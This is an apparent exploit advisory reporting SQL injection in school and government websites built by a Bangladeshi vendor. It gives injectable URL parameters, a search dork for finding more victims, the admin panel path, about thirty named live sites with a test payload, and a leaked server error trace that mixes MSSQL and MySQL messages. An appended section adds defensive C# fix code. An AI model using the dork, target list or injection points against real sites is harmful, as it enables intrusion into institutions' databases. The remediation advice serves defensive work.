Designed & Developed By Mars Software International Ltd Marssil Bangladesh Education SQL Injection Vulnerability

2018.11.06
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

#################################################################################################
# Exploit Title : Designed & Developed By Mars Software International Ltd Marssil Bangladesh Education SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 06/11/2018
# Vendor Homepage : marssil.com
# Tested On : Windows and Linux
# Version Information: Microsoft .NET Framework Version:2.0.50727.8793; ASP.NET Version:2.0.50727.8745
# Category : WebApps
# Google Dorks : intext:''Designed & Developed By : Mars Software International Ltd.'' site:edu.bd
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Admin Panel Login Path : /admin_data.aspx
#################################################################################################
# SQL Injection Exploit :

/View_Question_Answer.aspx?articleId=[SQL Injection]
/View_Doc.aspx?articleId=[SQL Injection]
/Class_Detail.aspx?classid=[SQL Injection]
/View_Community_Radio.aspx?articleId=[SQL Injection]
/View_Contact.aspx?articleId=[SQL Injection]
/View_Teacher.aspx?articleId=[SQL Injection]
/View_Page_Marquee.aspx?articleId=[SQL Injection]

#################################################################################################
# Example Vulnerable Sites =>

[+] chapainawabganjttc.gov.bd/View_Question_Answer.aspx?articleId=1%27
[+] kadamshaharhs.edu.bd/View_Question_Answer.aspx?articleId=1%27
[+] charghatmahadicollege.edu.bd/View_Doc.aspx?articleId=1%27
[+] bksskhulna.edu.bd/View_Question_Answer.aspx?articleId=1%27
[+] pallimangalsecschool.edu.bd/View_Question_Answer.aspx?articleId=1%27
[+] premtalicoll.edu.bd/View_Question_Answer.aspx?articleId=1%27
[+] jhikraparaahs.edu.bd/View_Question_Answer.aspx?articleId=1%27
[+] rajabarihhs.edu.bd/View_Question_Answer.aspx?articleId=1%27
[+] rm.edu.bd/View_Doc.aspx?articleId=1%27
[+] bgghs.edu.bd/View_Doc.aspx?articleId=1%27
[+] rhghs.edu.bd/View_Doc.aspx?articleId=1%27
[+] godacol.edu.bd/View_Doc.aspx?articleId=1%27
[+] afzp.edu.bd/View_Doc.aspx?articleId=1%27
[+] aks.edu.bd/View_Doc.aspx?articleId=1%27
[+] iet.edu.bd/View_Doc.aspx?articleId=1%27
[+] cadkhs.edu.bd/View_Doc.aspx?articleId=1%27
[+] gmdc.edu.bd/View_Doc.aspx?articleId=1%27
[+] jghs.edu.bd/View_Doc.aspx?articleId=1%27
[+] rajabarihhs.edu.bd/View_Doc.aspx?articleId=1%27
[+] premtalicoll.edu.bd/View_Doc.aspx?articleId=1%27
[+] ranihatimlhs.edu.bd/View_Doc.aspx?articleId=1%27
[+] bamlahalhs.edu.bd/View_Doc.aspx?articleId=1%27
[+] pn.edu.bd/View_Doc.aspx?articleId=1%27
[+] sardahgphs.edu.bd/View_Doc.aspx?articleId=1%27
[+] digramhs.edu.bd/View_Doc.aspx?articleId=1%27
[+] bhatoparaghs.edu.bd/View_Doc.aspx?articleId=1%27
[+] boliadaingahs.edu.bd/View_Doc.aspx?articleId=1%27
[+] nucghs.edu.bd/View_Doc.aspx?articleId=1%27
[+] anupnagarghs.edu.bd/View_Doc.aspx?articleId=1%27
[+] mkadegreecollege.edu.bd/View_Doc.aspx?articleId=1%27
[+] pakrihs.edu.bd/View_Doc.aspx?articleId=1%27

#################################################################################################
# SQL Database Error [ MSSQL Error Based Injection ]

Server Error in '/' Application.

Error converting data type nvarchar to int.

Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

Exception Details: System.Data.SqlClient.SqlException: Error converting data type nvarchar to int.

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''4''' at line 1

Source Error:

Line 1237: public static DataSet dae_QA(string articleId)
Line 1238: {
Line 1239:     DataSet ds = SqlHelper.ExecuteDataset(new SqlConnection(WebsiteConfig.ConnectionString),
Line 1240:         CommandType.StoredProcedure,
Line 1241:         "Article_Ais_QA",

Source File: c:\Hosting\Mars\_edu_sites\chapainawabganjttc.gov.bd\App_Code\Articles.cs    Line: 1239

Stack Trace:

[SqlException (0x80131904): Error converting data type nvarchar to int.]
   System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection) +212
   System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj) +245
   System.Data.SqlClient.TdsParser.Run(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj) +2843
   System.Data.SqlClient.SqlDataReader.ConsumeMetaData() +127
   System.Data.SqlClient.SqlDataReader.get_MetaData() +112
   System.Data.SqlClient.SqlCommand.FinishExecuteReader(SqlDataReader ds, RunBehavior runBehavior, String resetOptionsString) +6340436
   System.Data.SqlClient.SqlCommand.RunExecuteReaderTds(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream, Boolean async) +6341505
   System.Data.SqlClient.SqlCommand.RunExecuteReader(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream, String method, DbAsyncResult result) +424
   System.Data.SqlClient.SqlCommand.RunExecuteReader(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream, String method) +28
   System.Data.SqlClient.SqlCommand.ExecuteReader(CommandBehavior behavior, String method) +211
   System.Data.SqlClient.SqlCommand.ExecuteDbDataReader(CommandBehavior behavior) +19
   System.Data.Common.DbCommand.System.Data.IDbCommand.ExecuteReader(CommandBehavior behavior) +19
   System.Data.Common.DbDataAdapter.FillInternal(DataSet dataset, DataTable[] datatables, Int32 startRecord, Int32 maxRecords, String srcTable, IDbCommand command, CommandBehavior behavior) +221
   System.Data.Common.DbDataAdapter.Fill(DataSet dataSet, Int32 startRecord, Int32 maxRecords, String srcTable, IDbCommand command, CommandBehavior behavior) +573
   System.Data.Common.DbDataAdapter.Fill(DataSet dataSet) +166
   Microsoft.ApplicationBlocks.Data.SqlHelper.ExecuteDataset(SqlConnection connection, CommandType commandType, String commandText, SqlParameter[] commandParameters) +370
   Articles.dae_QA(String articleId) in c:\Hosting\Mars\_edu_sites\chapainawabganjttc.gov.bd\App_Code\Articles.cs:1239
   View_Question_Answer.Articledata() in c:\Hosting\Mars\_edu_sites\chapainawabganjttc.gov.bd\View_Question_Answer.aspx.cs:28
   View_Question_Answer.Page_Load(Object sender, EventArgs e) in c:\Hosting\Mars\_edu_sites\chapainawabganjttc.gov.bd\View_Question_Answer.aspx.cs:18
   System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +25
   System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) +42
   System.Web.UI.Control.OnLoad(EventArgs e) +132
   System.Web.UI.Control.LoadRecursive() +66
   System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2428

Version Information: Microsoft .NET Framework Version:2.0.50727.8793; ASP.NET Version:2.0.50727.8745

#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################
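The stack trace above shows two weaknesses a defender should fix together: `Articles.dae_QA(string articleId)` hands the raw query-string value to the `Article_Ais_QA` stored procedure as text (hence "Error converting data type nvarchar to int"), and the unhandled exception page leaks server file paths and source lines. The code below is an added example written for this advisory, not the vendor's code: it validates `articleId` as an integer before any database call and passes it as a typed `SqlDbType.Int` parameter. The stored procedure name comes from the trace; its `@articleId` parameter name, the `ConnectionString` setting and the page's control names are assumptions.

```csharp
// Added example (not the vendor's code) for an ASP.NET Web Forms page such as
// View_Question_Answer.aspx. Assumed: a web.config connection string named
// "WebsiteConfig" and a stored procedure Article_Ais_QA(@articleId INT).
using System;
using System.Configuration;
using System.Data;
using System.Data.SqlClient;
using System.Globalization;
using System.Web.UI;

public partial class View_Question_Answer : Page
{
    protected void Page_Load(object sender, EventArgs e)
    {
        // Accept only a plain, positive decimal integer. Anything else
        // ("1'", "1 OR 1=1", "1;--") is rejected here and never reaches SQL.
        int articleId;
        if (!int.TryParse(Request.QueryString["articleId"],
                          NumberStyles.None, CultureInfo.InvariantCulture,
                          out articleId) || articleId <= 0)
        {
            Response.StatusCode = 400;          // generic error, no stack trace
            Response.SuppressContent = true;
            HttpContext.Current.ApplicationInstance.CompleteRequest();
            return;
        }

        DataSet ds = LoadQuestionAnswer(articleId);
        // Bind ds to the page's data controls here (control names assumed).
    }

    // Replacement for Articles.dae_QA: the parameter is an int end to end,
    // so there is no string for an attacker-controlled value to be spliced into.
    private static DataSet LoadQuestionAnswer(int articleId)
    {
        string cs = ConfigurationManager.ConnectionStrings["WebsiteConfig"].ConnectionString;
        using (var conn = new SqlConnection(cs))
        using (var cmd = new SqlCommand("Article_Ais_QA", conn))
        {
            cmd.CommandType = CommandType.StoredProcedure;
            cmd.Parameters.Add("@articleId", SqlDbType.Int).Value = articleId;

            var ds = new DataSet();
            using (var adapter = new SqlDataAdapter(cmd))
            {
                adapter.Fill(ds);   // opens and closes the connection itself
            }
            return ds;
        }
    }
}
```

Two caveats. A typed parameter only closes the hole if `Article_Ais_QA` itself does not build dynamic SQL from its argument; the procedure body is not on this page, so it should be reviewed as well. Separately, the verbose error page is a configuration issue independent of the injection: setting `<customErrors mode="RemoteOnly" />` (or `On`) under `<system.web>` in web.config stops ASP.NET from returning source lines and `c:\Hosting\...` paths to remote clients, which is what turned this into an error-based injection in the first place.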

References:

https://www.cyberizm.org/cyberizm-mars-software-international-ltd-marssil-bd-edu-sql-inj.html


Copyright 2018, cxsecurity.com